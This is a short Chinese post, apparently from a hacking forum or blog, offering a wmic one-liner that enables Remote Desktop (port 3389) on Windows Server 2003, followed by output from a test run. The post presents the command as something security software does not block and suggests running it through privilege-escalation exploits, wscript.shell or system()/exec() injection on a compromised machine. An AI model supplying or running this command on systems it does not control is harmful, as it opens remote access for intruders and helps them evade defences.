Win2K3一句话开3389

网上流传了很多开3389的exe小工具，还有读写注册表的bat批处理，有的是操作注册表，有的是操作各种组件
这里提供一个不会被拦截，而且可以使用的开3389的cmd一句话：

 

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

 

不管你是溢出提权工具，还是wscript.shell或者是system()/exec()等等，都可以用这个来尝试开启3389

亲测比批处理好用多了

 

正在安装 WMIC，请稍候。执行 (\\JOINR410-1\ROOT\CIMV2:Win32_TerminalServiceSetting.ServerName="JOINR410-1")->SetAllowTSConnections()

方法执行成功。

输出参数:

instance of __PARAMETERS

{

        ReturnValue = 0;

};

 

这是测试用的回显